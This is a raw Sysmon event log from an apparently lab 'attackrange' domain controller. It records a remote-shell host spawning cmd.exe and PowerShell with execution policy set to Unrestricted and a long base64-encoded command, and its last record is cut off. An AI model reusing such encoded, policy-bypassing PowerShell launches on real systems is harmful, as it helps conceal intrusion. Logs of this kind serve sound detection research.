11:59:58.700{266CAFBE-643E-6064-CF02-00000000AD01}14724976C:\Windows\system32\cmd.exe{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.712{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-643E-6064-F4EC-110000000000}0x11ecf40HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-643E-6064-CF02-00000000AD01}1472C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-643E-6064-CE02-00000000AD01}21644624C:\Windows\system32\conhost.exe{266CAFBE-643E-6064-CF02-00000000AD01}1472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643E-6064-CF02-00000000AD01}1472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-643E-6064-CD02-00000000AD01}37044668C:\Windows\system32\WinrsHost.exe{266CAFBE-643E-6064-CF02-00000000AD01}1472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.706{266CAFBE-643E-6064-CF02-00000000AD01}1472C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUA